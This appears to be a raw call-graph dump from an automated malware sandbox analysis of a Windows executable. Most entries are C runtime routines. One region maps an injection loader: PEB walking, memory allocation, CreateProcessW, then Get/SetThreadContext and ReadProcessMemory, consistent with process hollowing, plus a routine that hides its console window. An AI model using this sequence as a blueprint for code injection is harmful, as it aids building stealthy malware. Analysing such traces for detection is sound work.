10058->10059 10060 40cc2f 10058->10060 10103 4047f0 10058->10103 10059->10036 10059->10037 10060->10059 10062 40cc49 GetConsoleMode 10060->10062 10062->10059 10064 40cba9 10063->10064 10067 40cbde 10063->10067 10065 40e730 5 API calls __wsopen_s 10064->10065 10066 40cbe0 GetLastError 10064->10066 10064->10067 10065->10064 10066->10067 10067->10051 10069 40c832 10068->10069 10077 40c839 __fread_nolock 10068->10077 10070 4047f0 __wsopen_s 39 API calls 10069->10070 10070->10077 10071 401ba5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10072 40cb80 10071->10072 10072->10051 10073 40b904 40 API calls __wsopen_s 10073->10077 10074 40e049 5 API calls __wsopen_s 10074->10077 10075 40caef 10075->10071 10075->10075 10077->10073 10077->10074 10077->10075 10078 40ca68 WriteFile 10077->10078 10080 40caa6 WriteFile 10077->10080 10110 4099f0 10077->10110 10078->10077 10079 40cb5e GetLastError 10078->10079 10079->10075 10080->10077 10080->10079 10086 40cd56 __wsopen_s 10081->10086 10082 40ce15 10083 401ba5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10082->10083 10085 40ce2e 10083->10085 10084 40cdcb WriteFile 10084->10086 10087 40ce17 GetLastError 10084->10087 10085->10051 10086->10082 10086->10084 10087->10082 10089 40ce3f __wsopen_s 10088->10089 10092 4099f0 __wsopen_s WideCharToMultiByte 10089->10092 10093 40cf49 GetLastError 10089->10093 10094 40cefe WriteFile 10089->10094 10095 40cf47 10089->10095 10090 401ba5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10091 40cf60 10090->10091 10091->10051 10092->10089 10093->10095 10094->10089 10094->10093 10095->10090 10101 40cc7b __wsopen_s 10096->10101 10097 40cd2c 10098 401ba5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10097->10098 10099 40cd45 10098->10099 10099->10051 10100 40cceb WriteFile 10100->10101 10102 40cd2e GetLastError 10100->10102 10101->10097 10101->10100 10102->10097 10104 4046c4 __wsopen_s 39 API calls 10103->10104 10105 404800 10104->10105 10106 40811e __wsopen_s 39 API calls 10105->10106 10107 40481d 10106->10107 10108 40817c __wsopen_s 39 API calls 10107->10108 10109 40482a 10108->10109 10109->10060 10112 409a03 __wsopen_s 10110->10112 10111 409a41 WideCharToMultiByte 10111->10077 10112->10111 10114 40a373 __fread_nolock 39 API calls 10113->10114 10115 40e6a0 10114->10115 10116 40e6a6 10115->10116 10118 40e6d8 10115->10118 10120 40a373 __fread_nolock 39 API calls 10115->10120 10117 40a2e2 __wsopen_s 15 API calls 10116->10117 10125 40e6fe __fread_nolock 10117->10125 10118->10116 10119 40a373 __fread_nolock 39 API calls 10118->10119 10121 40e6e4 CloseHandle 10119->10121 10122 40e6cf 10120->10122 10121->10116 10123 40e6f0 GetLastError 10121->10123 10124 40a373 __fread_nolock 39 API calls 10122->10124 10123->10116 10124->10118 10125->9924 10127 40cf75 __wsopen_s 10126->10127 10132 40cf99 10127->10132 10130 40427b __wsopen_s 39 API calls 10131 40cf94 10130->10131 10131->9937 10133 40cfa5 ___scrt_is_nonwritable_in_current_image 10132->10133 10134 40cfe6 10133->10134 10136 40d02c 10133->10136 10142 40cf87 10133->10142 10135 4064aa __wsopen_s 39 API calls 10134->10135 10135->10142 10143 40a0f7 EnterCriticalSection 10136->10143 10138 40d032 10139 40d050 10138->10139 10140 40d0aa __wsopen_s 62 API calls 10138->10140 10144 40d0a2 10139->10144 10140->10139 10142->10130 10143->10138 10147 40a1ac LeaveCriticalSection 10144->10147 10146 40d0a8 10146->10142 10147->10146 10148->9772 8841 a408b7 8853 a4005f GetPEB 8841->8853 8843 a40927 8854 a40838 8843->8854 8845 a4092f 8846 a409c2 8845->8846 8847 a409de CreateFileW 8845->8847 8847->8846 8848 a40a08 VirtualAlloc ReadFile 8847->8848 8848->8846 8851 a40a35 8848->8851 8849 a40a4e 8851->8849 8852 a40d78 ExitProcess 8851->8852 8867 a4020a 8851->8867 8853->8843 8882 a4005f GetPEB 8854->8882 8856 a4084c 8883 a4005f GetPEB 8856->8883 8858 a4085f 8884 a4005f GetPEB 8858->8884 8860 a40872 8885 a407da 8860->8885 8862 a40880 8863 a4089c VirtualAllocExNuma 8862->8863 8864 a408a9 8863->8864 8890 a4073a 8864->8890 8897 a4005f GetPEB 8867->8897 8869 a40218 8870 a403b3 8869->8870 8871 a403c1 CreateProcessW 8869->8871 8875 a403eb 8869->8875 8876 a41132 11 API calls 8869->8876 8878 a412e1 11 API calls 8869->8878 8880 a40675 SetThreadContext 8869->8880 8898 a411c7 8869->8898 8907 a40f80 8869->8907 8916 a41081 8869->8916 8870->8851 8872 a403f0 GetThreadContext 8871->8872 8871->8875 8873 a40410 ReadProcessMemory 8872->8873 8872->8875 8873->8869 8873->8875 8875->8870 8925 a41132 8875->8925 8876->8869 8878->8869 8880->8869 8880->8875 8882->8856 8883->8858 8884->8860 8895 a4005f GetPEB 8885->8895 8887 a407ea 8888 a407f0 GetSystemInfo 8887->8888 8889 a4081b 8888->8889 8889->8862 8896 a4005f GetPEB 8890->8896 8892 a40746 8893 a40766 VirtualAlloc 8892->8893 8894 a40783 8893->8894 8894->8845 8895->8887 8896->8892 8897->8869 8899 a411e2 8898->8899 8934 a4013e GetPEB 8899->8934 8901 a41203 8902 a412bb 8901->8902 8903 a4120b 8901->8903 8951 a4160d 8902->8951 8936 a40d81 8903->8936 8906 a412a2 8906->8869 8908 a40f9b 8907->8908 8909 a4013e GetPEB 8908->8909 8910 a40fbc 8909->8910 8911 a40fc4 8910->8911 8912 a4104e 8910->8912 8913 a40d81 10 API calls 8911->8913 8961 a41631 8912->8961 8915 a41035 8913->8915 8915->8869 8917 a4109c 8916->8917 8918 a4013e GetPEB 8917->8918 8919 a410bd 8918->8919 8920 a41107 8919->8920 8921 a410c1 8919->8921 8964 a41643 8920->8964 8922 a40d81 10 API calls 8921->8922 8924 a410fc 8922->8924 8924->8869 8926 a41145 8925->8926 8927 a4013e GetPEB 8926->8927 8928 a41166 8927->8928 8929 a411b0 8928->8929 8930 a4116a 8928->8930 8967 a415fb 8929->8967 8931 a40d81 10 API calls 8930->8931 8933 a411a5 8931->8933 8933->8870 8935 a40160 8934->8935 8935->8901 8954 a4005f GetPEB 8936->8954 8938 a40dca 8955 a40109 GetPEB 8938->8955 8941 a40e57 8942 a40e68 VirtualAlloc 8941->8942 8945 a40f2c 8941->8945 8943 a40e7e ReadFile 8942->8943 8942->8945 8944 a40e93 VirtualAlloc 8943->8944 8943->8945 8944->8945 8948 a40eb4 8944->8948 8946 a40f75 8945->8946 8947 a40f6a VirtualFree 8945->8947 8946->8906 8947->8946 8948->8945 8949 a40f1f VirtualFree 8948->8949 8950 a40f1b FindCloseChangeNotification 8948->8950 8949->8945 8950->8949 8952 a40d81 10 API calls 8951->8952 8953 a41617 8952->8953 8953->8906 8954->8938 8957 a4011c 8955->8957 8958 a40131 CreateFileW 8957->8958 8959 a4017b GetPEB 8957->8959 8958->8941 8958->8945 8960 a4019f 8959->8960 8960->8957 8962 a40d81 10 API calls 8961->8962 8963 a4163b 8962->8963 8963->8915 8965 a40d81 10 API calls 8964->8965 8966 a4164d 8965->8966 8966->8924 8968 a40d81 10 API calls 8967->8968 8969 a41605 8968->8969 8969->8933 10882 40665a 10892 408454 10882->10892 10886 406667 10905 40bae2 10886->10905 10889 406691 10890 408654 ___free_lconv_mon 14 API calls 10889->10890 10891 40669c 10890->10891 10909 4082e5 10892->10909 10895 40ba37 10896 40ba43 ___scrt_is_nonwritable_in_current_image 10895->10896 10980 409efe EnterCriticalSection 10896->10980 10898 40baba 10987 40bad9 10898->10987 10901 40ba8e DeleteCriticalSection 10903 408654 ___free_lconv_mon 14 API calls 10901->10903 10904 40ba4e 10903->10904 10904->10898 10904->10901 10981 40e276 10904->10981 10906 40baf9 10905->10906 10907 406676 DeleteCriticalSection 10905->10907 10906->10907 10908 408654 ___free_lconv_mon 14 API calls 10906->10908 10907->10886 10907->10889 10908->10907 10912 408239 10909->10912 10913 408245 ___scrt_is_nonwritable_in_current_image 10912->10913 10920 409efe EnterCriticalSection 10913->10920 10915 4082bb 10929 4082d9 10915->10929 10918 40824f ___scrt_uninitialize_crt 10918->10915 10921 4081ad 10918->10921 10920->10918 10922 4081b9 ___scrt_is_nonwritable_in_current_image 10921->10922 10932 4066a6 EnterCriticalSection 10922->10932 10924 4081c3 ___scrt_uninitialize_crt 10925 4081fc 10924->10925 10933 4083ef 10924->10933 10946 40822d 10925->10946 10979 409f46 LeaveCriticalSection 10929->10979 10931 406662 10931->10895 10932->10924 10934 408404 __wsopen_s 10933->10934 10935 408416 10934->10935 10936 40840b 10934->10936 10937 408386 ___scrt_uninitialize_crt 64 API calls 10935->10937 10938 4082e5 ___scrt_uninitialize_crt 68 API calls 10936->10938 10940 408420 10937->10940 10939 408411 10938->10939 10941 40427b __wsopen_s 39 API calls 10939->10941 10940->10939 10942 40656b __fread_nolock 39 API calls 10940->10942 10943 40844e 10941->10943 10944 408437 10942->10944 10943->10925 10949 40c743 10944->10949 10978 4066ba LeaveCriticalSection 10946->10978 10948 40821b 10948->10918 10950 40c761 10949->10950 10951 40c754 10949->10951 10953 40c7aa 10950->10953 10955 40c788 10950->10955 10952 407b2a __dosmaperr 14 API calls 10951->10952 10959 40c759 10952->10959 10954 407b2a __dosmaperr 14 API calls 10953->10954 10956 40c7af 10954->10956 10960 40c6a1 10955->10960 10958 406527 __wsopen_s 39 API calls 10956->10958 10958->10959 10959->10939 10961 40c6ad ___scrt_is_nonwritable_in_current_image 10960->10961 10973 40a0f7 EnterCriticalSection 10961->10973 10963 40c6bc 10964 40c701 10963->10964 10965 40a373 __fread_nolock 39 API calls 10963->10965 10966 407b2a __dosmaperr 14 API calls 10964->10966 10967 40c6e8 FlushFileBuffers 10965->10967 10968 40c708 10966->10968 10967->10968 10969 40c6f4 GetLastError 10967->10969 10974 40c737 10968->10974 10970 407b17 __dosmaperr 14 API calls 10969->10970 10970->10964 10973->10963 10977 40a1ac LeaveCriticalSection 10974->10977 10976 40c720 10976->10959 10977->10976 10978->10948 10979->10931 10980->10904 10982 40e289 __wsopen_s 10981->10982 10990 40e151 10982->10990 10984 40e295 10985 40427b __wsopen_s 39 API calls 10984->10985 10986 40e2a1 10985->10986 10986->10904 11040 409f46 LeaveCriticalSection 10987->11040 10989 40bac6 10989->10886 10991 40e15d ___scrt_is_nonwritable_in_current_image 10990->10991 10992 40e167 10991->10992 10993 40e18a 10991->10993 10994 4064aa __wsopen_s 39 API calls 10992->10994 11000 40e182 10993->11000 11001 4066a6 EnterCriticalSection 10993->11001 10994->11000 10996 40e1a8 11002 40e1e8 10996->11002 10998 40e1b5 11016 40e1e0 10998->11016 11000->10984 11001->10996 11003 40e1f5 11002->11003 11005 40e218 11002->11005 11004 4064aa __wsopen_s 39 API calls 11003->11004 11006 40e210 11004->11006 11005->11006 11007 408386 ___scrt_uninitialize_crt 64 API calls 11005->11007 11006->10998 11008 40e230 11007->11008 11009 40bae2 14 API calls 11008->11009 11010 40e238 11009->11010 11011 40656b __fread_nolock 39 API calls 11010->11011 11012 40e244 11011->11012 11019 40e5bd 11012->11019 11015 408654 ___free_lconv_mon 14 API calls 11015->11006 11039 4066ba LeaveCriticalSection 11016->11039 11018 40e1e6 11018->11000 11020 40e5e6 11019->11020 11025 40e24b 11019->11025 11021 40e635 11020->11021 11023 40e60d 11020->11023 11022 4064aa __wsopen_s 39 API calls 11021->11022 11022->11025 11026 40e52c 11023->11026 11025->11006 11025->11015 11027 40e538 ___scrt_is_nonwritable_in_current_image 11026->11027 11034 40a0f7 EnterCriticalSection 11027->11034 11029 40e546 11030 40e577 11029->11030 11031 40e690 __wsopen_s 42 API calls 11029->11031 11035 40e5b1 11030->11035 11031->11030 11034->11029 11038 40a1ac LeaveCriticalSection 11035->11038 11037 40e59a 11037->11025 11038->11037 11039->11018 11040->10989 9420 40845d 9421 40846a 9420->9421 9425 408482 9420->9425 9422 407b2a __dosmaperr 14 API calls 9421->9422 9423 40846f 9422->9423 9424 406527 __wsopen_s 39 API calls 9423->9424 9432 40847a 9424->9432 9426 4084e1 9425->9426 9425->9432 9440 40d2c6 9425->9440 9445 40656b 9426->9445 9429 4084fa 9452 4073f7 9429->9452 9433 40656b __fread_nolock 39 API calls 9434 408533 9433->9434 9434->9432 9435 40656b __fread_nolock 39 API calls 9434->9435 9436 408541 9435->9436 9436->9432 9437 40656b __fread_nolock 39 API calls 9436->9437 9438 40854f 9437->9438 9439 40656b __fread_nolock 39 API calls 9438->9439 9439->9432 9441 4085f7 _unexpected 14 API calls 9440->9441 9442 40d2e3 9441->9442 9443 408654 ___free_lconv_mon 14 API calls 9442->9443 9444 40d2ed 9443->9444 9444->9426 9446 406577 9445->9446 9447 40658c 9445->9447 9448 407b2a __dosmaperr 14 API calls 9446->9448 9447->9429 9449 40657c 9448->9449 9450 406527 __wsopen_s 39 API calls 9449->9450 9451 406587 9450->9451 9451->9429 9453 407403 ___scrt_is_nonwritable_in_current_image 9452->9453 9454 40740b 9453->9454 9458 407426 9453->9458 9550 407b17 9454->9550 9457 407b2a __dosmaperr 14 API calls 9481 407418 9457->9481 9459 40743d 9458->9459 9460 407478 9458->9460 9461 407b17 __dosmaperr 14 API calls 9459->9461 9462 407481 9460->9462 9463 407496 9460->9463 9464 407442 9461->9464 9465 407b17 __dosmaperr 14 API calls 9462->9465 9482 40a0f7 EnterCriticalSection 9463->9482 9467 407b2a __dosmaperr 14 API calls 9464->9467 9468 407486 9465->9468 9470 40744a 9467->9470 9471 407b2a __dosmaperr 14 API calls 9468->9471 9469 40749c 9472 4074d0 9469->9472 9473 4074bb 9469->9473 9474 406527 __wsopen_s 39 API calls 9470->9474 9471->9470 9483 407510 9472->9483 9476 407b2a __dosmaperr 14 API calls 9473->9476 9474->9481 9478 4074c0 9476->9478 9477 4074cb 9553 407508 9477->9553 9479 407b17 __dosmaperr 14 API calls 9478->9479 9479->9477 9481->9432 9481->9433 9482->9469 9484 407522 9483->9484 9485 40753a 9483->9485 9486 407b17 __dosmaperr 14 API calls 9484->9486 9487 40787c 9485->9487 9492 40757d 9485->9492 9488 407527 9486->9488 9489 407b17 __dosmaperr 14 API calls 9487->9489 9490 407b2a __dosmaperr 14 API calls 9488->9490 9491 407881 9489->9491 9493 40752f 9490->9493 9494 407b2a __dosmaperr 14 API calls 9491->9494 9492->9493 9495 407588 9492->9495 9500 4075b8 9492->9500 9493->9477 9496 407595 9494->9496 9497 407b17 __dosmaperr 14 API calls 9495->9497 9501 406527 __wsopen_s 39 API calls 9496->9501 9498 40758d 9497->9498 9499 407b2a __dosmaperr 14 API calls 9498->9499 9499->9496 9502 4075d1 9500->9502 9503 40760c 9500->9503 9504 4075de 9500->9504 9501->9493 9502->9504 9505 4075fa 9502->9505 9565 40a663 9503->9565 9507 407b17 __dosmaperr 14 API calls 9504->9507 9556 40bb22 9505->9556 9509 4075e3 9507->9509 9511 407b2a __dosmaperr 14 API calls 9509->9511 9514 4075ea 9511->9514 9513 408654 ___free_lconv_mon 14 API calls 9516 407626 9513->9516 9517 406527 __wsopen_s 39 API calls 9514->9517 9515 407758 9518 4077cc 9515->9518 9519 407771 GetConsoleMode 9515->9519 9520 408654 ___free_lconv_mon 14 API calls 9516->9520 9533 4075f5 __fread_nolock 9517->9533 9521 4077d0 ReadFile 9518->9521 9519->9518 9522 407782 9519->9522 9523 40762d 9520->9523 9524 407844 GetLastError 9521->9524 9525 4077e8 9521->9525 9522->9521 9526 407788 ReadConsoleW 9522->9526 9527 407652 9523->9527 9528 407637 9523->9528 9529 407851 9524->9529 9530 4077a8 9524->9530 9525->9524 9539 4077c1 9525->9539 9532 4077a2 GetLastError 9526->9532 9526->9539 9572 406894 9527->9572 9535 407b2a __dosmaperr 14 API calls 9528->9535 9536 407b2a __dosmaperr 14 API calls 9529->9536 9530->9533 9578 407ad0 9530->9578 9532->9530 9534 408654 ___free_lconv_mon 14 API calls 9533->9534 9534->9493 9541 40763c 9535->9541 9537 407856 9536->9537 9542 407b17 __dosmaperr 14 API calls 9537->9542 9539->9533 9543 407824 9539->9543 9544 40780d 9539->9544 9545 407b17 __dosmaperr 14 API calls 9541->9545 9542->9533 9543->9533 9547 40783d 9543->9547 9583 407222 9544->9583 9549 407647 9545->9549 9596 407068 9547->9596 9549->9533 9551 406d81 __dosmaperr 14 API calls 9550->9551 9552 407410 9551->9552 9552->9457 9632 40a1ac LeaveCriticalSection 9553->9632 9555 40750e 9555->9481 9557 40bb3c 9556->9557 9558 40bb2f 9556->9558 9561 40bb48 9557->9561 9562 407b2a __dosmaperr 14 API calls 9557->9562 9559 407b2a __dosmaperr 14 API calls 9558->9559 9560 40bb34 9559->9560 9560->9515 9561->9515 9563 40bb69 9562->9563 9564 406527 __wsopen_s 39 API calls 9563->9564 9564->9560 9566 40a6a1 9565->9566 9570 40a671 _unexpected 9565->9570 9568 407b2a __dosmaperr 14 API calls 9566->9568 9567 40a68c HeapAlloc 9569 40761d 9567->9569 9567->9570 9568->9569 9569->9513 9570->9566 9570->9567 9571 40b132 _unexpected 2 API calls 9570->9571 9571->9570 9573 4068a8 __wsopen_s 9572->9573 9602 4067f3 9573->9602 9575 4068bd 9576 40427b __wsopen_s 39 API calls 9575->9576 9577 4068cc 9576->9577 9577->9505 9579 407b17 __dosmaperr 14 API calls 9578->9579 9580 407adb __dosmaperr 9579->9580 9581 407b2a __dosmaperr 14 API calls 9580->9581 9582 407aee 9581->9582 9582->9533 9621 406f1b 9583->9621 9587 407336 9590 40733f GetLastError 9587->9590 9593 40726a 9587->9593 9588 4072c4 9594 40727e 9588->9594 9595 406894 __fread_nolock 41 API calls 9588->9595 9589 4072b4 9591 407b2a __dosmaperr 14 API calls 9589->9591 9592 407ad0 __dosmaperr 14 API calls 9590->9592 9591->9593 9592->9593 9593->9533 9627 409936 9594->9627 9595->9594 9597 4070a2 9596->9597 9598 407138 ReadFile 9597->9598 9599 407133 9597->9599 9598->9599 9600 407155 9598->9600 9599->9549 9600->9599 9601 406894 __fread_nolock 41 API calls 9600->9601 9601->9599 9608 40a373 9602->9608 9604 406805 9605 406821 SetFilePointerEx 9604->9605 9607 40680d __fread_nolock 9604->9607 9606 406839 GetLastError 9605->9606 9605->9607 9606->9607 9607->9575 9609 40a380 9608->9609 9611 40a395 9608->9611 9610 407b17 __dosmaperr 14 API calls 9609->9610 9613 40a385 9610->9613 9612 407b17 __dosmaperr 14 API calls 9611->9612 9614 40a3ba 9611->9614 9615 40a3c5 9612->9615 9616 407b2a __dosmaperr 14 API calls 9613->9616 9614->9604 9617 407b2a __dosmaperr 14 API calls 9615->9617 9618 40a38d 9616->9618 9619 40a3cd 9617->9619 9618->9604 9620 406527 __wsopen_s 39 API calls 9619->9620 9620->9618 9622 406f4f 9621->9622 9623 406fc0 ReadFile 9622->9623 9624 406fbb 9622->9624 9623->9624 9625 406fd9 9623->9625 9624->9588 9624->9589 9624->9593 9624->9594 9625->9624 9626 406894 __fread_nolock 41 API calls 9625->9626 9626->9624 9630 40989e 9627->9630 9631 4098af MultiByteToWideChar 9630->9631 9631->9587 9632->9555 10149 40125e 10150 40126a ___scrt_is_nonwritable_in_current_image 10149->10150 10175 401460 10150->10175 10152 401271 10153 4013ca 10152->10153 10162 40129b ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 10152->10162 10207 401754 IsProcessorFeaturePresent 10153->10207 10155 4013d1 10211 4059b2 10155->10211 10158 405976 CallUnexpected 21 API calls 10159 4013df 10158->10159 10160 4012ba 10161 40133b 10186 405624 10161->10186 10162->10160 10162->10161 10201 40598c 10162->10201 10165 401341 10190 401000 GetConsoleWindow ShowWindow 10165->10190 10176 401469 10175->10176 10214 4019c5 IsProcessorFeaturePresent 10176->10214 10180 40147a 10185 40147e 10180->10185 10224 4060a1 10180->10224 10182 401495 10182->10152 10185->10152 10187 405632 10186->10187 10188 40562d 10186->10188 10187->10165 10338 40537e 10188->10338 10603 4047d3 10190->10603 10197 404b34 66 API calls 10198 401075 VirtualAlloc 10197->10198 10618 404d47 10198->10618 10202 4059a2 ___scrt_is_nonwritable_in_current_image _unexpected 10201->10202 10202->10161 10203 406c30 _unexpected 39 API calls 10202->10203 10206 406153 10203->10206 10204 4061fe CallUnexpected 39 API calls 10205 40617d 10204->10205 10206->10204 10208 40176a __fread_nolock CallUnexpected 10207->10208 10209 401815 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10208->10209 10210 401860 CallUnexpected 10209->10210 10210->10155 10212 4057e6 CallUnexpected 21 API calls 10211->10212 10213 4013d7 10212->10213 10213->10158 10215 401475 10214->10215 10216 401e7e 10215->10216 10233 4024b1 10216->10233 10220 401e8f 10221 401e9a 10220->10221 10247 4024ed 10220->10247 10221->10180 10223 401e87 10223->10180 10287 40b08a 10224->10287 10227 401e9d 10228 401eb0 10227->10228 10229 401ea6 10227->10229 10228->10185 10230 402496 ___vcrt_uninitialize_ptd 6 API calls 10229->10230 10231 401eab 10230->10231 10232 4024ed ___vcrt_uninitialize_locks DeleteCriticalSection 10231->10232 10232->10228 10234 4024ba 10233->10234 10236 4024e3 10234->10236 10238 401e83 10234->10238 10251 40272d 10234->10251 10237 4024ed ___vcrt_uninitialize_locks DeleteCriticalSection 10236->10237 10237->10238 10238->10223 10239 402463 10238->10239 10268 40263e 10239->10268 10242 402478 10242->10220 10245 402493 10245->10220 10248 402517 10247->10248 10249 4024f8 10247->10249 10248->10223 10250 402502 DeleteCriticalSection 10249->10250 10250->10248 10250->10250 10256 402553 10251->10256 10254 402765 InitializeCriticalSectionAndSpinCount 10255 402750 10254->10255 10255->10234 10257 402570 10256->10257 10258 402574 10256->10258 10257->10254 10257->10255 10258->10257 10259 4025dc GetProcAddress 10258->10259 10261 4025cd 10258->10261 10263 4025f3 LoadLibraryExW 10258->10263 10259->10257 10261->10259 10262 4025d5 FreeLibrary 10261->10262 10262->10259 10264 40260a GetLastError 10263->10264 10265 40263a 10263->10265 10264->10265 10266 402615 ___vcrt_InitializeCriticalSectionEx 10264->10266 10265->10258 10266->10265 10267 40262b LoadLibraryExW 10266->10267 10267->10258 10269 402553 ___vcrt_InitializeCriticalSectionEx 5 API calls 10268->10269 10270 402658 10269->10270 10271 402671 TlsAlloc 10270->10271 10272 40246d 10270->10272 10272->10242 10273 4026ef 10272->10273 10274 402553 ___vcrt_InitializeCriticalSectionEx 5 API calls 10273->10274 10275 402709 10274->10275 10276 402724 TlsSetValue 10275->10276 10277 402486 10275->10277 10276->10277 10277->10245 10278 402496 10277->10278 10279 4024a0 10278->10279 10280 4024a6 10278->10280 10282 402679 10279->10282 10280->10242 10283 402553 ___vcrt_InitializeCriticalSectionEx 5 API calls 10282->10283 10284 402693 10283->10284 10285 4026ab TlsFree 10284->10285 10286 40269f 10284->10286 10285->10286 10286->10280 10288 40b09a 10287->10288 10289 401487 10287->10289 10288->10289 10292 407a01 10288->10292 10304 407951 10288->10304 10289->10182 10289->10227 10293 407a0d ___scrt_is_nonwritable_in_current_image 10292->10293 10309 409efe EnterCriticalSection 10293->10309 10295 407a14 10310 40a059 10295->10310 10302 407951 2 API calls 10303 407a32 10302->10303 10329 407a58 10303->10329 10305 407958 10304->10305 10306 40799b GetStdHandle 10305->10306 10307 4079fd 10305->10307 10308 4079ae GetFileType 10305->10308 10306->10305 10307->10288 10308->10305 10309->10295 10311 40a065 ___scrt_is_nonwritable_in_current_image 10310->10311 10312 40a06e 10311->10312 10313 40a08f 10311->10313 10314 407b2a __dosmaperr 14 API calls 10312->10314 10332 409efe EnterCriticalSection 10313->10332 10316 40a073 10314->10316 10318 406527 __wsopen_s 39 API calls 10316->10318 10317 40a09b 10320 40a0c7 10317->10320 10322 409fa9 __wsopen_s 15 API calls 10317->10322 10319 407a23 10318->10319 10319->10303 10323 40789b GetStartupInfoW 10319->10323 10333 40a0ee 10320->10333 10322->10317 10324 4078b8 10323->10324 10325 40794c 10323->10325 10324->10325 10326 40a059 40 API calls 10324->10326 10325->10302 10327 4078e0 10326->10327 10327->10325 10328 407910 GetFileType 10327->10328 10328->10327 10337 409f46 LeaveCriticalSection 10329->10337 10331 407a43 10331->10288 10332->10317 10336 409f46 LeaveCriticalSection 10333->10336 10335 40a0f5 10335->10319 10336->10335 10337->10331 10339 405387 10338->10339 10342 40539d 10338->10342 10339->10342 10344 4053aa 10339->10344 10341 405394 10341->10342 10361 405515 10341->10361 10342->10187 10345 4053b3 10344->10345 10346 4053b6 10344->10346 10345->10341 10369 4095d6 10346->10369 10351 4053d3 10397 405404 10351->10397 10352 4053c7 10353 408654 ___free_lconv_mon 14 API calls 10352->10353 10355 4053cd 10353->10355 10355->10341 10357 408654 ___free_lconv_mon 14 API calls 10358 4053f7 10357->10358 10359 408654 ___free_lconv_mon 14 API calls 10358->10359 10360 4053fd 10359->10360 10360->10341 10362 405586 10361->10362 10367 405524 10361->10367 10362->10342 10363 4099f0 WideCharToMultiByte __wsopen_s 10363->10367 10364 4085f7 _unexpected 14 API calls 10364->10367 10365 40558a 10366 408654 ___free_lconv_mon 14 API calls 10365->10366 10366->10362 10367->10362 10367->10363 10367->10364 10367->10365 10368 408654 ___free_lconv_mon 14 API calls 10367->10368 10368->10367 10370 4095df 10369->10370 10374 4053bc 10369->10374 10419 406ceb 10370->10419 10375 409a93 GetEnvironmentStringsW 10374->10375 10376 4053c1 10375->10376 10377 409aab 10375->10377 10376->10351 10376->10352 10378 4099f0 __wsopen_s WideCharToMultiByte 10377->10378 10379 409ac8 10378->10379 10380 409ad2 FreeEnvironmentStringsW 10379->10380 10381 409add 10379->10381 10380->10376 10382 40a663 __fread_nolock 15 API calls 10381->10382 10383 409ae4 10382->10383 10384 409aec 10383->10384 10385 409afd 10383->10385 10386 408654 ___free_lconv_mon 14 API calls 10384->10386 10387 4099f0 __wsopen_s WideCharToMultiByte 10385->10387 10388 409af1 FreeEnvironmentStringsW 10386->10388 10389 409b0d 10387->10389 10390 409b2e 10388->10390 10391 409b14 10389->10391 10392 409b1c 10389->10392 10390->10376 10394 408654 ___free_lconv_mon 14 API calls 10391->10394 10393 408654 ___free_lconv_mon 14 API calls 10392->10393 10395 409b1a FreeEnvironmentStringsW 10393->10395 10394->10395 10395->10390 10398 405419 10397->10398 10399 4085f7 _unexpected 14 API calls 10398->10399 10400 405440 10399->10400 10401 405448 10400->10401 10409 405452 10400->10409 10402 408654 ___free_lconv_mon 14 API calls 10401->10402 10418 4053da 10402->10418 10403 4054af 10404 408654 ___free_lconv_mon 14 API calls 10403->10404 10404->10418 10405 4085f7 _unexpected 14 API calls 10405->10409 10406 4054be 10597 4054e6 10406->10597 10409->10403 10409->10405 10409->10406 10412 4054d9 10409->10412 10414 408654 ___free_lconv_mon 14 API calls 10409->10414 10588 4061a4 10409->10588 10411 408654 ___free_lconv_mon 14 API calls 10413 4054cb 10411->10413 10415 406537 __wsopen_s 11 API calls 10412->10415 10416 408654 ___free_lconv_mon 14 API calls 10413->10416 10414->10409 10417 4054e5 10415->10417 10416->10418 10418->10357 10420 406cf6 10419->10420 10423 406cfc 10419->10423 10421 40ae5e _unexpected 6 API calls 10420->10421 10421->10423 10422 40ae9d _unexpected 6 API calls 10424 406d16 10422->10424 10423->10422 10425 406d02 10423->10425 10424->10425 10426 4085f7 _unexpected 14 API calls 10424->10426 10427 4061fe CallUnexpected 39 API calls 10425->10427 10428 406d07 10425->10428 10429 406d26 10426->10429 10430 406d80 10427->10430 10444 4093e1 10428->10444 10431 406d43 10429->10431 10432 406d2e 10429->10432 10434 40ae9d _unexpected 6 API calls 10431->10434 10433 40ae9d _unexpected 6 API calls 10432->10433 10435 406d3a 10433->10435 10436 406d4f 10434->10436 10439 408654 ___free_lconv_mon 14 API calls 10435->10439 10437 406d62 10436->10437 10438 406d53 10436->10438 10441 406a5e _unexpected 14 API calls 10437->10441 10440 40ae9d _unexpected 6 API calls 10438->10440 10439->10425 10440->10435 10442 406d6d 10441->10442 10443 408654 ___free_lconv_mon 14 API calls 10442->10443 10443->10428 10445 409536 __wsopen_s 39 API calls 10444->10445 10446 40940b 10445->10446 10467 409168 10446->10467 10449 409424 10449->10374 10450 40a663 __fread_nolock 15 API calls 10451 409435 10450->10451 10452 40944b 10451->10452 10453 40943d 10451->10453 10474 409631 10452->10474 10454 408654 ___free_lconv_mon 14 API calls 10453->10454 10454->10449 10457 409483 10458 407b2a __dosmaperr 14 API calls 10457->10458 10460 409488 10458->10460 10459 4094ca 10462 409513 10459->10462 10485 40905a 10459->10485 10463 408654 ___free_lconv_mon 14 API calls 10460->10463 10461 40949e 10461->10459 10464 408654 ___free_lconv_mon 14 API calls 10461->10464 10466 408654 ___free_lconv_mon 14 API calls 10462->10466 10463->10449 10464->10459 10466->10449 10468 40806f __wsopen_s 39 API calls 10467->10468 10469 40917a 10468->10469 10470 409189 GetOEMCP 10469->10470 10471 40919b 10469->10471 10472 4091b2 10470->10472 10471->10472 10473 4091a0 GetACP 10471->10473 10472->10449 10472->10450 10473->10472 10475 409168 41 API calls 10474->10475 10476 409651 10475->10476 10477 409756 10476->10477 10478 40968e IsValidCodePage 10476->10478 10484 4096a9 __fread_nolock 10476->10484 10479 401ba5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10477->10479 10478->10477 10481 4096a0 10478->10481 10480 409478 10479->10480 10480->10457 10480->10461 10482 4096c9 GetCPInfo 10481->10482 10481->10484 10482->10477 10482->10484 10493 40923c 10484->10493 10486 409066 ___scrt_is_nonwritable_in_current_image 10485->10486 10562 409efe EnterCriticalSection 10486->10562 